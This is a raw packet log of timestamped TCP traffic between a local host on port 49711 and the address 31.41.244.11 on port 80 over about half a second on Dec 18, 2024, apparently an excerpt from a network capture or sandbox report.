                                                                                                                                                                                          Dec 18, 2024 09:07:11.877207041 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.877290010 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.879410028 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.879479885 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.879560947 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.879616976 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.881711006 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.881743908 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.881772041 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.881800890 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.884169102 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.884202003 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.884239912 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.884272099 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.886300087 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.886333942 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.886382103 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.886414051 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.888417959 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.888494015 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.888695955 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.888751030 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.890641928 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.890762091 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.890836000 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.892880917 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.893068075 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.893150091 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.895138979 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.895206928 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.895277023 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.895348072 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.897408962 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.897744894 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.897819042 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.899689913 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.899780989 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.899857044 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.901937008 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.901998997 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.902034044 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.902087927 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.904329062 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.904521942 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.904581070 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.906531096 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.906603098 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.906673908 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.906841040 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.908746004 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.909106970 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.909171104 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.910967112 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.911031008 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.911117077 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.911170959 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.913245916 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.913453102 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.913526058 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.915477991 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.915587902 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.915659904 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.984761953 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.984833002 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.984900951 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.984987974 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.985600948 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.985685110 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.985749960 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.985830069 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.987373114 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.987447023 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.987569094 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.987638950 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.989240885 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.989299059 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.989310980 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.989363909 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.991429090 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.991465092 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.991486073 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.991511106 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.993571997 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.993628979 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.993710995 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.993767023 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.995763063 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.995820999 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.995915890 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.995968103 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.997066021 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.997119904 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.997181892 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.997236013 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.997941971 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.997993946 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.998038054 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.998090029 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.999263048 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.999330044 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.999407053 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.999460936 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.000971079 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.001034975 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.001136065 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.001200914 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.002566099 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.002662897 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.002780914 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.002839088 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.004401922 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.004436970 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.004460096 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.004488945 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.005686045 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.005742073 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.005801916 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.005856037 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.007245064 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.007299900 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.007464886 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.007519960 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.008948088 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.008980989 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.009001970 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.009030104 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.010497093 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.010554075 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.010590076 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.010642052 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.011847973 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.011904001 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.011960983 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.012015104 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.013487101 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.013536930 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.013559103 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.013607025 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.015053034 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.015088081 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.015105963 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.015134096 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.016305923 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.016360998 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.016397953 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.016448975 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.017766953 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.017828941 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.017911911 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.018124104 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.019397974 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.019433022 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.019495010 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.020782948 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.020875931 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.020929098 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.022176027 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.022233009 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.022301912 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.022352934 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.023575068 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.023705006 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.023761988 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.025296926 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.025353909 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.025423050 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.025487900 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.026930094 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.027035952 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.027091026 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.028393984 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.028510094 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.028585911 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.029577017 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.029633045 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.029689074 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.029759884 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.030957937 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.031028986 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.031111002 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.031158924 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.032293081 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.032357931 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.032481909 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.032535076 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.033813000 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.033893108 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.033931971 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.033993959 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.035012960 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.035073996 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.035116911 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.035197020 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.036164045 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.036216974 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.036226034 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.036293983 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.037512064 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.037545919 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.037568092 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.037626028 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.038789988 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.038841963 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.038975954 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.039032936 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.040282011 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.040317059 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.040366888 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.041606903 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.041667938 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.041749954 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.041796923 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.042840958 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.042893887 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.042962074 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.043005943 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.044223070 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.044332027 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.044384003 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.045526028 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.045587063 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.045718908 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.045774937 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.046905041 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.046966076 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.046999931 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.047076941 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.048377037 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.048480034 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.048541069 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.049551010 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.049608946 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.049664974 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.049715996 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.050961971 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.051019907 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.051130056 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.051177025 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.052211046 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.052324057 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.052329063 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.052372932 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.053533077 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.053740025 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.053797960 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.054852009 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.054955959 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.055038929 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.055092096 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.056157112 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.056212902 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.056329966 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.056384087 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.057490110 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.057548046 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.057627916 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.057689905 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.058862925 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.058918953 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.058954000 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.058999062 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.060400009 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.060517073 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.060569048 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.061477900 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.061525106 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.176692009 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.176891088 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.176898003 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.176987886 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.177136898 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.177191973 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.177411079 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.177483082 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.178458929 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.178525925 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.178702116 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.178765059 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.179207087 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.179258108 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.179265976 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.179310083 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.180093050 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.180150986 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.180210114 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.180264950 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.181011915 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.181070089 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.181229115 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.181288958 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.181996107 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.182054996 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.182126045 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.182183027 CET4971180192.168.2.831.41.244.11
